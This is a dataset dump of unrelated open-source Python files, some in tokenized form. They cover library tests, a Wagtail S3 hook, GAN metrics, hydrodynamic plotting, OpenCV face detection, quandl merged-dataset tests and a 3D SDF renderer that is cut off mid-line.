content (string, lengths 0 to 1.55M) |
---|
import pytest
import numpy as np
import pclpy


def test_eigen_vectorxf():
    a = np.array([1, 1, 1, 1], "f")
    vec = pclpy.pcl.vectors.VectorXf(a)
    assert np.allclose(np.array(vec), a)
|
from django.core.files.storage import get_storage_class
from django.shortcuts import redirect
from django.utils.cache import add_never_cache_headers
from storages.backends.s3boto3 import S3Boto3Storage
from wagtail.core import hooks
from wagtail.documents import get_document_model
from wagtail.documents.models import document_served


@hooks.register("before_serve_document", order=100)
def serve_document_from_s3(document, request):
    # Skip this hook if not using django-storages boto3 backend.
    if not issubclass(get_storage_class(), S3Boto3Storage):
        return

    # Send document_served signal.
    document_served.send(sender=get_document_model(), instance=document, request=request)

    # Get direct S3 link.
    file_url = document.file.url

    # Generate redirect response and add never_cache headers.
    response = redirect(file_url)
    del response["Cache-control"]
    add_never_cache_headers(response)
    return response


@hooks.register("construct_settings_menu")
def hide_main_menu_menu_item(request, menu_items):
    menu_items[:] = [item for item in menu_items if item.name != "main-menu"]
|
"""Configuration file for production Development"""

DEBUG = False
|
"""
Sync method tests.
"""
import pytest

from aiosmtplib.sync import async_to_sync


def test_sendmail_sync(event_loop, smtp_client_threaded, sender_str, recipient_str, message_str):
    errors, response = smtp_client_threaded.sendmail_sync(sender_str, [recipient_str], message_str)

    assert not errors
    assert isinstance(errors, dict)
    assert response != ""


def test_sendmail_sync_when_connected(event_loop, smtp_client_threaded, sender_str, recipient_str, message_str):
    event_loop.run_until_complete(smtp_client_threaded.connect())
    errors, response = smtp_client_threaded.sendmail_sync(sender_str, [recipient_str], message_str)

    assert not errors
    assert isinstance(errors, dict)
    assert response != ""


def test_send_message_sync(event_loop, smtp_client_threaded, message):
    errors, response = smtp_client_threaded.send_message_sync(message)

    assert not errors
    assert isinstance(errors, dict)
    assert response != ""


def test_send_message_sync_when_connected(event_loop, smtp_client_threaded, message):
    event_loop.run_until_complete(smtp_client_threaded.connect())
    errors, response = smtp_client_threaded.send_message_sync(message)

    assert not errors
    assert isinstance(errors, dict)
    assert response != ""


def test_async_to_sync_without_loop(event_loop):
    async def test_func():
        return 7

    result = async_to_sync(test_func())

    assert result == 7


def test_async_to_sync_with_exception(event_loop):
    async def test_func():
        raise ZeroDivisionError

    with pytest.raises(ZeroDivisionError):
        async_to_sync(test_func(), loop=event_loop)


@pytest.mark.asyncio
async def test_async_to_sync_with_running_loop(event_loop):
    with pytest.raises(RuntimeError):
        async_to_sync(None)
|
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Custom flag type definitions."""

import gflags
import numpy


def DEFINE_linspace(name, default, help_string, nonempty=False,
                    increasing=False, flag_values=gflags.FLAGS,
                    **kwargs):  # pylint: disable=invalid-name
  """Defines a 'linspace' flag.
The flag value should be specified as <lower>,<upper>,<count>. The
components are used as arguments to numpy.linspace, so they must be
parsable as float, float, and int, respectively. The parsed flag
value will be a 1-dimensional numpy.ndarray.
Args:
name: Name of the flag.
default: Default value (as unparsed string), or None if flag is unset by
default.
help_string: Helpful description of the flag.
nonempty: Indicates whether the flag value is required to be nonempty. If
True, None is still an allowable default. Use gflags.MarkFlagAsRequired
to disallow None.
increasing: Indicates whether the flag value should be an increasing array.
This is only enforced if the parsed value has >=2 elements.
flag_values: The gflags.FlagValues object in which to define the flag.
**kwargs: See gflags.DEFINE.
  """
  gflags.DEFINE(_LinspaceParser(), name, default, help_string,
                flag_values=flag_values, **kwargs)

  if nonempty:
    # numpy.array can't be implicitly converted to a boolean.
    # pylint: disable=g-explicit-length-test
    gflags.RegisterValidator(name, lambda v: len(v) > 0,
                             '--%s must specify a nonempty range.' % name,
                             flag_values=flag_values)

  if increasing:
    gflags.RegisterValidator(name, lambda v: len(v) < 2 or v[-1] > v[0],
                             '--%s must specify an increasing range.' % name,
                             flag_values=flag_values)


class _LinspaceParser(gflags.ArgumentParser):
  """Parser for 'linspace' flag type."""

  def Parse(self, argument):
    parts = argument.split(',')
    if len(parts) != 3:
      raise ValueError('Wrong number of components. Must be of the form '
                       '<lower>,<upper>,<count>', argument)
    try:
      lower, upper, count = float(parts[0]), float(parts[1]), int(parts[2])
    except ValueError:
      raise ValueError('Bad value. Components must be parsable as float, '
                       'float, and int, respectively', argument)
    return numpy.linspace(lower, upper, count)

  def Type(self):
    return numpy.ndarray
|
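A short, hedged usage sketch of the `DEFINE_linspace` helper above; the importing module name, the flag name, and its default value are hypothetical and not part of the original file.

import gflags

from flag_types import DEFINE_linspace  # hypothetical module holding the helper above

DEFINE_linspace('sweep', '0.0,1.0,5',
                'Sweep range, specified as <lower>,<upper>,<count>.',
                nonempty=True, increasing=True)

# After gflags.FLAGS(argv) parses e.g. --sweep=0.0,2.0,9, FLAGS.sweep is
# numpy.linspace(0.0, 2.0, 9): a 1-D, increasing numpy.ndarray of 9 values.
|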
# -*- coding:utf-8 -*-
__author__ = 'yangjian'
|
# coding=utf-8
# Copyright 2018 Google LLC & <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of the Frechet Inception Distance.
Implemented as a wrapper around the tf.contrib.gan library. The details can be
found in "GANs Trained by a Two Time-Scale Update Rule Converge to a Local Nash
Equilibrium", Heusel et al. [https://arxiv.org/abs/1706.08500].
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

from absl import logging
from compare_gan.metrics import eval_task
import tensorflow as tf
import tensorflow_gan as tfgan

# Special value returned when FID code returned exception.
FID_CODE_FAILED = 4242.0


class FIDScoreTask(eval_task.EvalTask):
  """Evaluation task for the FID score."""

  _LABEL = "fid_score"

  def run_after_session(self, fake_dset, real_dset):
    logging.info("Calculating FID.")
    with tf.Graph().as_default():
      fake_activations = tf.convert_to_tensor(fake_dset.activations)
      real_activations = tf.convert_to_tensor(real_dset.activations)
      fid = tfgan.eval.frechet_classifier_distance_from_activations(
          real_activations=real_activations,
          generated_activations=fake_activations)
      with self._create_session() as sess:
        fid = sess.run(fid)
      logging.info("Frechet Inception Distance: %.3f.", fid)
      return {self._LABEL: fid}


def compute_fid_from_activations(fake_activations, real_activations):
  """Returns the FID based on activations.
Args:
fake_activations: NumPy array with fake activations.
real_activations: NumPy array with real activations.
Returns:
A float, the Frechet Inception Distance.
  """
  logging.info("Computing FID score.")
  assert fake_activations.shape == real_activations.shape
  with tf.Session(graph=tf.Graph()) as sess:
    fake_activations = tf.convert_to_tensor(fake_activations)
    real_activations = tf.convert_to_tensor(real_activations)
    fid = tfgan.eval.frechet_classifier_distance_from_activations(
        real_activations=real_activations,
        generated_activations=fake_activations)
    return sess.run(fid)
|
<import_stmt>pytest<import_from_stmt>bottery.message Message<import_from_stmt>bottery.telegram reply<import_from_stmt>bottery.telegram.engine TelegramChat TelegramEngine TelegramUser<line_sep>@pytest.fixture<def_stmt>engine <block_start><return>TelegramEngine<block_end>@pytest.fixture<def_stmt>user <block_start><return>TelegramUser<block_end>@pytest.fixture<def_stmt>chat <block_start><return>TelegramChat<block_end>@pytest.fixture()<def_stmt>message <block_start><return>Message(id=1 platform='telegram' text='' user=user chat=chat timestamp='' raw='' )<block_end>@pytest.fixture<def_stmt>message_data <block_start><return>{'message':{'chat':{'first_name':'John' 'id':12345678 'last_name':'Snow' 'type':'private' 'username':'johnsnow'} 'date':1516787847 'from':{'first_name':'John' 'id':12345678 'is_bot':<false> 'language_code':'en-US' 'last_name':'Snow' 'username':'johnsnow'} 'message_id':2 'text':'Hi bot, how are you?'} 'update_id':987456321}<block_end>@pytest.fixture<def_stmt>edited_message_data message_data<block_start><return>{'edited_message':message_data['message']}<block_end>@pytest.mark.parametrize('chat_type,id_expected' [('group' 456) ('private' 123) ])<def_stmt>test_platform_telegram_engine_get_chat_id chat_type id_expected engine message<block_start>setattr(message.chat 'id' id_expected)<line_sep>setattr(message.chat 'type' chat_type)<line_sep>setattr(message.user 'id' id_expected)<assert_stmt>engine.get_chat_id(engine message)<eq>id_expected<block_end>@pytest.mark.parametrize('message_input,message_key,message_edited' [(pytest.lazy_fixture('message_data') 'message' <false>) (pytest.lazy_fixture('edited_message_data') 'edited_message' <true>)])<def_stmt>test_build_message engine message_input message_key message_edited<block_start>message=engine.build_message(engine message_input)<assert_stmt>message.id<eq>message_input[message_key]['message_id']<assert_stmt>message.text<eq>message_input[message_key]['text']<assert_stmt>message.timestamp<eq>message_input[message_key]['date']<assert_stmt>message.raw<eq>message_input<assert_stmt>message.edited<eq>message_edited<block_end><def_stmt>test_build_message_without_text message_data engine<block_start>'''
Telegram can send a message without text.
For example, when a bot is added to a group.
'''<line_sep>message_data_without_text=message_data<del_stmt>message_data_without_text['message']['text']<line_sep>message=engine.build_message(engine message_data_without_text)<assert_stmt>message.id<eq>message_data_without_text['message']['message_id']<assert_stmt>message.text<is><not><none><assert_stmt>message.text<eq>''<assert_stmt>message.timestamp<eq>message_data_without_text['message']['date']<assert_stmt>message.raw<eq>message_data<block_end><def_stmt>test_reply_decorator message<block_start>@reply()<def_stmt>view message<block_start><return>''<block_end>view(message)<assert_stmt>message._request_payload['reply_to_message_id']<eq>message.id<block_end><def_stmt>test_reply_decorator_to_previous_message message<block_start>@reply(to=<lambda>message:message.id-2)<def_stmt>view message<block_start><return>''<block_end>view(message)<assert_stmt>message._request_payload['reply_to_message_id']<eq>message.id-2<block_end> |
"""
Quick plot for the outputs of transcritical flow without shock
"""
import anuga.utilities.plot_utils as util
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as pyplot
from analytical_without_shock import *
from numpy import ones

p_st = util.get_output('transcritical.sww')
p2_st = util.get_centroids(p_st)

v = p2_st.y[10]
v2 = (p2_st.y == v)

h, z = analytic_sol(p2_st.x[v2])
tid = 100

# Plot the stages ##############################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.stage[tid, v2], 'b.-', label='numerical stage')  # 0*T/6
pyplot.plot(p2_st.x[v2], h + z, 'r-', label='analytical stage')
pyplot.plot(p2_st.x[v2], z, 'k-', label='bed elevation')
pyplot.title('Stage at time %s secs' % p2_st.time[tid])
##pyplot.ylim(-5.0,5.0)
pyplot.legend(loc='best')
pyplot.xlabel('Xposition')
pyplot.ylabel('Stage')
pyplot.savefig('stage_plot.png')

# Plot the momentums ###########################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.xmom[tid, v2], 'b.-', label='numerical')  # 0*T/6
pyplot.plot(p2_st.x[v2], 1.53 * ones(len(p2_st.x[v2])), 'r-', label='analytical')
pyplot.title('Xmomentum at time %s secs' % p2_st.time[tid])
pyplot.legend(loc='best')
pyplot.ylim([1.52, 1.54])
pyplot.xlabel('Xposition')
pyplot.ylabel('Xmomentum')
pyplot.savefig('xmom_plot.png')

# Plot the velocities ##########################################################
pyplot.clf()
pyplot.plot(p2_st.x[v2], p2_st.xvel[tid, v2], 'b.-', label='numerical')  # 0*T/6
pyplot.plot(p2_st.x[v2], 1.53 / h, 'r-', label='analytical')
pyplot.title('Xvelocity at time %s secs' % p2_st.time[tid])
pyplot.legend(loc='best')
pyplot.xlabel('Xposition')
pyplot.ylabel('Xvelocity')
pyplot.savefig('xvel_plot.png')
|
<import_stmt>argparse<import_stmt>glob<import_stmt>os<import_stmt>time<import_stmt>cv2<import_stmt>imutils<import_from_stmt>imutils.object_detection non_max_suppression<line_sep>subject_label=1<line_sep>font=cv2.FONT_HERSHEY_SIMPLEX<line_sep>list_of_videos=[]<line_sep>cascade_path="face_cascades/haarcascade_profileface.xml"<line_sep>face_cascade=cv2.CascadeClassifier(cascade_path)<line_sep>hog=cv2.HOGDescriptor()<line_sep>hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())<line_sep>recognizer=cv2.face.LBPHFaceRecognizer_create()<line_sep>count=0<def_stmt>detect_people frame<block_start>"""
detect humans using HOG descriptor
Args:
frame:
Returns:
processed frame
"""<line_sep>(rects weights)=hog.detectMultiScale(frame winStride=(8 8) padding=(16 16) scale=1.06)<line_sep>rects=non_max_suppression(rects probs=<none> overlapThresh=0.65)<for_stmt>(x y w h) rects<block_start>cv2.rectangle(frame (x y) (x+w y+h) (0 0 255) 2)<block_end><return>frame<block_end><def_stmt>detect_face frame<block_start>"""
detect human faces in image using haar-cascade
Args:
frame:
Returns:
coordinates of detected faces
"""<line_sep>faces=face_cascade.detectMultiScale(frame 1.1 2 0 (20 20))<line_sep><return>faces<block_end><def_stmt>recognize_face frame_orginal faces<block_start>"""
recognize human faces using LBPH features
Args:
frame_orginal:
faces:
Returns:
label of predicted person
"""<line_sep>predict_label=[]<line_sep>predict_conf=[]<for_stmt>x,y,w,h faces<block_start>frame_orginal_grayscale=cv2.cvtColor(frame_orginal[y:y+h x:x+w] cv2.COLOR_BGR2GRAY)<line_sep>cv2.imshow("cropped" frame_orginal_grayscale)<line_sep>predict_tuple=recognizer.predict(frame_orginal_grayscale)<line_sep>a,b=predict_tuple<line_sep>predict_label.append(a)<line_sep>predict_conf.append(b)<line_sep>print("Predition label, confidence: "+str(predict_tuple))<block_end><return>predict_label<block_end><def_stmt>draw_faces frame faces<block_start>"""
draw rectangle around detected faces
Args:
frame:
faces:
Returns:
face drawn processed frame
"""<for_stmt>(x y w h) faces<block_start>xA=x<line_sep>yA=y<line_sep>xB=x+w<line_sep>yB=y+h<line_sep>cv2.rectangle(frame (xA yA) (xB yB) (0 255 0) 2)<block_end><return>frame<block_end><def_stmt>put_label_on_face frame faces labels<block_start>"""
draw label on faces
Args:
frame:
faces:
labels:
Returns:
processed frame
"""<line_sep>i=0<for_stmt>x,y,w,h faces<block_start>cv2.putText(frame str(labels[i]) (x y) font 1 (255 255 255) 2)<line_sep>i<augadd>1<block_end><return>frame<block_end><def_stmt>background_subtraction previous_frame frame_resized_grayscale min_area<block_start>"""
This function returns 1 for the frames in which the area
after subtraction with previous frame is greater than minimum area
defined.
Thus expensive computation of human detection face detection
and face recognition is not done on all the frames.
Only the frames undergoing significant amount of change (which is controlled min_area)
are processed for detection and recognition.
"""<line_sep>frameDelta=cv2.absdiff(previous_frame frame_resized_grayscale)<line_sep>thresh=cv2.threshold(frameDelta 25 255 cv2.THRESH_BINARY)[1]<line_sep>thresh=cv2.dilate(thresh <none> iterations=2)<line_sep>im2,cnts,hierarchy=cv2.findContours(thresh.copy() cv2.RETR_EXTERNAL cv2.CHAIN_APPROX_SIMPLE)<line_sep>temp=0<for_stmt>c cnts# if the contour is too small, ignore it
<block_start><if_stmt>cv2.contourArea(c)<g>min_area<block_start>temp=1<block_end><block_end><return>temp<block_end><if_stmt>__name__<eq>'__main__'<block_start>"""
main function
"""<line_sep>ap=argparse.ArgumentParser()<line_sep>ap.add_argument("-v" "--videos" required=<true> help="path to videos directory")<line_sep>args=vars(ap.parse_args())<line_sep>path=args["videos"]<for_stmt>f os.listdir(path)<block_start>list_of_videos=glob.glob(os.path.join(os.path.abspath(path) f))<line_sep>print(os.path.join(os.path.abspath(path) f)+"*.mp4")<line_sep>print(list_of_videos)<if_stmt>os.path.exists("model.yaml")<block_start>recognizer.read("model.yaml")<for_stmt>video list_of_videos<block_start>camera=cv2.VideoCapture(os.path.join(path video))<line_sep>grabbed,frame=camera.read()<line_sep>print(frame.shape)<line_sep>frame_resized=imutils.resize(frame width=min(800 frame.shape[1]))<line_sep>frame_resized_grayscale=cv2.cvtColor(frame_resized cv2.COLOR_BGR2GRAY)<line_sep>print(frame_resized.shape)<line_sep># defining min cuoff area
min_area=(3000/800)<times>frame_resized.shape[1]<while_stmt><true><block_start>starttime=time.time()<line_sep>previous_frame=frame_resized_grayscale<line_sep>grabbed,frame=camera.read()<if_stmt><not>grabbed<block_start><break><block_end>frame_resized=imutils.resize(frame width=min(800 frame.shape[1]))<line_sep>frame_resized_grayscale=cv2.cvtColor(frame_resized cv2.COLOR_BGR2GRAY)<line_sep>temp=background_subtraction(previous_frame frame_resized_grayscale min_area)<if_stmt>temp<eq>1<block_start>frame_processed=detect_people(frame_resized)<line_sep>faces=detect_face(frame_resized_grayscale)<if_stmt>len(faces)<g>0<block_start>frame_processed=draw_faces(frame_processed faces)<line_sep>label=recognize_face(frame_resized faces)<line_sep>frame_processed=put_label_on_face(frame_processed faces label)<block_end>cv2.imshow("Detected Human and face" frame_processed)<line_sep>key=cv2.waitKey(1)&0xFF<if_stmt>key<eq>ord("q")<block_start><break><block_end>endtime=time.time()<line_sep>print("Time to process a frame: "+str(starttime-endtime))<block_end><else_stmt><block_start>count=count+1<line_sep>print("Number of frame skipped in the video= "+str(count))<block_end><block_end>camera.release()<line_sep>cv2.destroyAllWindows()<block_end><block_end><else_stmt><block_start>print("model file not found")<block_end>list_of_videos=[]<block_end><block_end> |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

def print_color(code: int, message: str) -> None:
    print(f"\033[{code}m{message}\033[00m")


def print_green(message: str) -> None:
    print_color(92, message)


def print_yellow(message: str) -> None:
    print_color(93, message)


def print_cyan(message: str) -> None:
    print_color(96, message)


def print_red(message: str) -> None:
    print_color(91, message)


def snake_to_camelcase(name: str) -> str:
    """Convert snake-case string to camel-case string."""
    return "".join(n.capitalize() for n in name.split("_"))
|
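A small usage example for the helpers above; the printed colors depend on the terminal, and the `snake_to_camelcase` result follows directly from its definition.

print_green("build succeeded")  # wrapped in the ANSI escape \033[92m ... \033[00m
print_red("build failed")       # wrapped in \033[91m ... \033[00m

assert snake_to_camelcase("snake_to_camelcase") == "SnakeToCamelcase"
|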
<import_stmt>unittest<import_from_stmt>test.helpers.httpretty_extension httpretty<import_stmt>six<import_stmt>datetime<import_stmt>pandas<import_from_stmt>quandl.model.dataset Dataset<import_from_stmt>quandl.model.data Data<import_from_stmt>quandl.model.merged_data_list MergedDataList<import_from_stmt>quandl.model.merged_dataset MergedDataset<import_from_stmt>mock patch call<import_from_stmt>quandl.errors.quandl_error ColumnNotFound<import_from_stmt>test.helpers.merged_datasets_helper setupDatasetsTest<class_stmt>GetMergedDatasetTest(unittest.TestCase)<block_start>@classmethod<def_stmt>setUp self<block_start>setupDatasetsTest(self httpretty)<block_end>@classmethod<def_stmt>tearDownClass cls<block_start>httpretty.disable()<line_sep>httpretty.reset()<block_end>@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')<def_stmt>test_merged_dataset_calls_merged_dataset_get_dataset self mock<block_start>mock.return_value=self.oil_obj<line_sep>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>md.data_fields()<line_sep>expected_calls=[call(('NSE/OIL' {'column_index':[1 2]})) call(('WIKI/AAPL' {'column_index':[1]})) call('WIKI/MSFT')]<line_sep>self.assertEqual(mock.call_count 3)<for_stmt>index,expected enumerate(expected_calls)<block_start>self.assertEqual(mock.mock_calls[index] expected)<block_end><block_end>@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')<def_stmt>test_removes_column_index_query_param self mock<block_start>self.oil_obj.requested_column_indexes=[]<line_sep>mock.return_value=self.oil_obj<line_sep>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]})] params={'column_index':1})<line_sep>md.data_fields()<line_sep>expected=call(('NSE/OIL' {'column_index':[1 2]}) params={})<line_sep>self.assertEqual(mock.call_args expected)<block_end><def_stmt>test_sets_dataset_codes_for_the_datasets self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>self.assertEqual(md._datasets <none>)<line_sep>six.assertCountEqual(self [1 2] md.dataset_codes[0][1]['column_index'])<line_sep>six.assertCountEqual(self [1] md.dataset_codes[1][1]['column_index'])<line_sep>self.assertEqual('I' md.dataset_codes[2][1])<block_end><def_stmt>test_sets_column_index_on_each_dataset self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>md.data_fields()<line_sep>six.assertCountEqual(self [1 2] md._datasets[0].requested_column_indexes)<line_sep>six.assertCountEqual(self [1] md._datasets[1].requested_column_indexes)<line_sep>six.assertCountEqual(self [] md._datasets[2].requested_column_indexes)<block_end><def_stmt>test_merged_dataset_column_names self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>expected=[six.u('Date') six.u('NSE/OIL - column.1') six.u('NSE/OIL - column.2') six.u('WIKI/AAPL - column.1') six.u('WIKI/MSFT - column.1') six.u('WIKI/MSFT - column.2') six.u('WIKI/MSFT - column.3')]<line_sep>six.assertCountEqual(self md.column_names expected)<block_end><def_stmt>test_merged_dataset_oldest_available_date self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>self.assertEqual(md.oldest_available_date datetime.date(2013 1 1))<block_end><def_stmt>test_merged_dataset_newest_available_date 
self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>self.assertEqual(md.newest_available_date datetime.date(2015 7 30))<block_end><def_stmt>test_merged_dataset_database_codes self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>six.assertCountEqual(self md.database_code ['NSE' 'WIKI'])<block_end><def_stmt>test_merged_dataset_dataset_codes self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>six.assertCountEqual(self md.dataset_code ['OIL' 'AAPL' 'MSFT'])<block_end><def_stmt>test_get_returns_merged_dataset_obj self<block_start>md=MergedDataset(['NSE/OIL'])<line_sep>self.assertIsInstance(md MergedDataset)<block_end><def_stmt>test_raise_error_when_datasets_arg_not_list self<block_start>self.assertRaises(ValueError <lambda>:MergedDataset('NSE/OIL').data_fields())<block_end><def_stmt>test_raise_error_when_datasets_arg_list_has_invalid_type self<block_start>self.assertRaises(ValueError <lambda>:MergedDataset(['NSE/OIL' {'blah':[1]}]).data_fields())<block_end><def_stmt>test_raise_error_when_column_index_specified_and_not_list self<block_start>self.assertRaises(ValueError <lambda>:MergedDataset([('NSE/OIL' {'column_index':'foo'})]).data_fields())<block_end><def_stmt>test_raise_error_when_column_index_greater_than_max self<block_start>self.assertRaises(ColumnNotFound <lambda>:MergedDataset([('NSE/OIL' {'column_index':[1 10]})]).data())<block_end><def_stmt>test_raise_error_when_column_index_less_than_one self<block_start>self.assertRaises(ColumnNotFound <lambda>:MergedDataset([('NSE/OIL' {'column_index':[0 1]})]).data())<block_end>@patch.object(Dataset 'data')<def_stmt>test_when_only_one_column_requested_adds_column_index_query_param self mock_method<block_start>mock_method.return_value=self.data_list_obj<line_sep>MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')]).data(params={'start_date':'2015-07-01'})<line_sep>expected_calls=[call(params={'start_date':'2015-07-01'}) call(params={'column_index':1 'start_date':'2015-07-01'}) call(params={'start_date':'2015-07-01'})]<line_sep>self.assertEqual(mock_method.mock_calls[0] expected_calls[0])<line_sep>self.assertEqual(mock_method.mock_calls[1] expected_calls[1])<line_sep>self.assertEqual(mock_method.mock_calls[2] expected_calls[2])<block_end>@patch.object(Dataset 'data')<def_stmt>test_data_forwards_requests_to_datset_data self mock_method<block_start>mock_method.return_value=self.data_list_obj<line_sep>MergedDataset(['NSE/OIL' 'WIKI/AAPL' 'WIKI/MSFT']).data(params={'start_date':'2015-07-01'})<line_sep>self.assertEqual(mock_method.call_count 3)<for_stmt>actual mock_method.mock_calls<block_start>self.assertEqual(actual call(params={'start_date':'2015-07-01'}))<block_end><block_end><def_stmt>test_get_merged_dataset_data_returns_correct_types self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')]).data()<line_sep>self.assertIsInstance(data MergedDataList)<line_sep>self.assertIsInstance(data[0] Data)<block_end><def_stmt>test_get_merged_dataset_creates_merged_pandas_dataframe self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')]).data()<line_sep>self.assertIsInstance(data.to_pandas() 
pandas.core.frame.DataFrame)<block_end><def_stmt>test_get_merged_dataset_data_returns_specified_columns self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('SINGLE/COLUMN' {'column_index':[1]}) ('WIKI/MSFT')]).data()<line_sep>actual=data.to_pandas().columns.tolist()<line_sep>expected=[six.u('NSE/OIL - column.1') six.u('NSE/OIL - column.2') six.u('SINGLE/COLUMN - column.1') six.u('WIKI/MSFT - column.1') six.u('WIKI/MSFT - column.2') six.u('WIKI/MSFT - column.3')]<line_sep>six.assertCountEqual(self actual expected)<block_end><def_stmt>test_get_merged_dataset_data_to_list self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('SINGLE/COLUMN' {'column_index':[1]}) 'WIKI/MSFT']).data()<line_sep>results=data.to_list()<line_sep># NSE/OIL two columns of data
# SINGLE/COLUMN one column of data
# WIKI/MSFT all 3 columns of data
expected=[[datetime.datetime(2015 7 11 0 0) 444.3 10 444.3 444.3 10 3] [datetime.datetime(2015 7 13 0 0) 433.3 4 433.3 433.3 4 3] [datetime.datetime(2015 7 14 0 0) 437.5 3 437.5 437.5 3 3] [datetime.datetime(2015 7 15 0 0) 440.0 2 440.0 440.0 2 3]]<for_stmt>index,expected_item enumerate(expected)<block_start>six.assertCountEqual(self expected_item results[index])<block_end><block_end><def_stmt>test_get_merged_dataset_data_is_descending_when_specified_in_params self<block_start>data=MergedDataset(['NSE/OIL' 'WIKI/AAPL' 'WIKI/MSFT']).data(params={'order':'desc'})<line_sep>results=data.to_list()<line_sep>dates=list([x[0]<for>x results])<line_sep>self.assertTrue(all(dates[i]<ge>dates[i+1]<for>i range(len(dates)-1)))<block_end><block_end> |
from torch.distributed.distributed_c10d import is_initialized
from torch.utils.data import Dataset, DistributedSampler


def get_ddp_sampler(dataset: Dataset, epoch: int):
    """
This function will create a DistributedSampler if DDP is initialized,
and will just return None if DDP is not initialized.
    """
    if is_initialized():
        sampler = DistributedSampler(dataset)
        sampler.set_epoch(epoch)
    else:
        sampler = None
    return sampler
|
<import_stmt>os sys<import_stmt>torch<import_stmt>numpy<as>np<line_sep>sys.path.append(os.path.dirname(os.path.abspath(__file__)))<import_from_stmt>renderer SDFRenderer<line_sep>sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)) '..' '..'))<import_from_stmt>core.utils.decoder_utils decode_sdf decode_sdf_gradient decode_color<import_from_stmt>core.visualize.profiler Profiler<class_stmt>SDFRenderer_deepsdf(SDFRenderer)<block_start><def_stmt>__init__ self decoder intrinsic img_hw=<none> march_step=50 buffer_size=5 ray_marching_ratio=1.5 max_sample_dist=0.2 threshold=5e-5 use_gpu=<true> is_eval=<true><block_start>super(SDFRenderer_deepsdf self).__init__(decoder intrinsic img_hw=img_hw march_step=march_step buffer_size=buffer_size ray_marching_ratio=ray_marching_ratio max_sample_dist=max_sample_dist threshold=threshold use_gpu=use_gpu is_eval=is_eval)<block_end><def_stmt>get_samples self latent RT depth normal clamp_dist=0.1 eta=0.01 use_rand=<true><block_start>R,T=RT[: :3] RT[: 3]<line_sep>cam_pos=self.get_camera_location(R T)<line_sep>cam_rays=self.get_camera_rays(R)<line_sep>depth=depth.reshape(-1)<line_sep>normal=normal.reshape(-1 3)<line_sep>valid_mask=(depth<l>1e5)&(depth<g>0)<line_sep>valid_depth,valid_normal=depth[valid_mask] normal[valid_mask :]<line_sep>valid_zdepth=valid_depth/self.calib_map[valid_mask]<line_sep>points=self.generate_point_samples(cam_pos cam_rays[: valid_mask] valid_zdepth has_zdepth_grad=<false>)<line_sep>points=points.transpose(1 0)<if_stmt>use_rand<block_start>eta_map=torch.rand_like(valid_depth)<times>eta<block_end><else_stmt><block_start>eta_map=torch.ones_like(valid_depth)<times>eta<block_end>valid_normal_inv=self.inv_transform_points(valid_normal.transpose(1 0)).transpose(1 0)<line_sep>offset=valid_normal_inv<times>eta_map.unsqueeze(-1)<line_sep>points_pos=points+offset<line_sep>samples_pos=decode_sdf(self.decoder latent points_pos clamp_dist=clamp_dist).squeeze(-1)<line_sep>samples_pos=samples_pos-eta_map<line_sep>points_neg=points-offset<line_sep>samples_neg=decode_sdf(self.decoder latent points_neg clamp_dist=clamp_dist).squeeze(-1)<line_sep>samples_neg=samples_neg+eta_map<line_sep><return>samples_pos samples_neg<block_end><def_stmt>get_freespace_samples self latent RT depth clamp_dist=0.1 number=1<block_start>R,T=RT[: :3] RT[: 3]<line_sep>cam_pos=self.get_camera_location(R 